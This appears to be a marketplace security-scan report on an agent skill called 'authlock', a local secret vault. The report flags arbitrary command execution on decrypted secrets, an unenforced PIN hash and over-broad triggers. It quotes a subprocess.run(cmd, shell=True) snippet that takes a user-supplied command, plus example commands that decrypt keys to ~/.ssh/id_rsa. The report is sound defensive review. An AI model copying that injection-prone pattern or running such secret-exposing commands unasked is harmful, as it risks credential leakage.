ClawHub

authlock

Security checks across malware telemetry and agentic risk

Overview

AuthLock is a coherent local secret-vault tool, but its security model is under-scoped for high-value secrets because it stores the TOTP seed locally and can hand decrypted credentials to arbitrary shell commands.

Install only if you understand this is a local file-based vault, not hardware-backed MFA. Protect the .authlock directory, avoid decrypting to stdout through an agent, use --exec only with commands you wrote and trust, and do not store critical production credentials unless you accept the local-seed security model.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
Findings (9)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
try:
            os.chmod(tmp_path, 0o600)
            cmd = args.exec.replace("-", tmp_path)
            subprocess.run(cmd, shell=True)
        finally:
            os.unlink(tmp_path)
    else:
Confidence
98% confidence
Finding
subprocess.run(cmd, shell=True)

Lp3

Medium
Category
MCP Least Privilege
Confidence
93% confidence
Finding
The skill declares no permissions while its documented behavior clearly relies on environment variables, filesystem access, and shell execution. This under-declaration is dangerous because it prevents accurate risk review and can cause an agent platform to invoke a skill with broader capabilities than users or administrators expect.

Tp4

High
Category
MCP Tool Poisoning
Confidence
97% confidence
Finding
The skill markets itself as MFA-bound secret protection, but the documented behavior includes arbitrary command execution with decrypted secrets, local plaintext storage of the TOTP seed, and broader secret-management operations not reflected in the description. This mismatch is dangerous because reviewers and users may trust the skill as a narrow encryption tool while it actually enables secret exposure and code execution pathways.

Context-Inappropriate Capability

High
Confidence
96% confidence
Finding
A tool advertised as MFA-bound secret protection should decrypt and return data, not act as a general command launcher over decrypted content. This feature materially increases blast radius: once a secret is opened, the tool can be used to execute arbitrary programs against it, which makes accidental exfiltration or abuse much easier.

Intent-Code Divergence

Medium
Confidence
99% confidence
Finding
The configuration code stores a `pin_hash`, but seal/open operations never verify that stored value; instead they only derive the encryption key from an ad hoc entered PIN. This creates a misleading security control where users may believe a configured PIN is enforced, when in reality the stored PIN setting provides no authentication check and can lead to lockout/confusion rather than real protection.

Vague Triggers

Medium
Confidence
82% confidence
Finding
The trigger keywords are broad enough to match ordinary discussions about passwords, certificates, or MFA, which can cause the skill to activate in contexts where the user did not intend secret-handling or shell-capable behavior. In a secret-management skill, over-broad auto-triggering increases the chance of unnecessary exposure of sensitive paths, secret names, or operational prompts.

Vague Triggers

Medium
Confidence
81% confidence
Finding
The standalone keyword list lacks contextual constraints and repeats generic phrases, making accidental invocation more likely. Because this skill deals with decryption workflows and secret references, ambiguous triggering can expose users to unsafe prompts or unintended secret-management actions.

Missing User Warnings

High
Confidence
95% confidence
Finding
The tool can execute commands on decrypted data without an explicit warning or constrained execution model. In this context, decrypted secrets are highly sensitive, so silently handing them to shell commands creates a strong risk of exfiltration, command injection, or unintended persistence in process arguments, logs, or child tools.

Credential Access

High
Category
Privilege Escalation
Content
authlock open my-server-key --code 123456

# Decrypt to file
authlock open my-server-key --code 123456 --output ~/.ssh/id_rsa

# Decrypt and execute (SSH example)
authlock open prod-ssh-key --code 123456 --exec "ssh -i - user@host"
Confidence
95% confidence
Finding
~/.ssh/id_rsa

VirusTotal

67/67 vendors flagged this skill as clean.

View on VirusTotal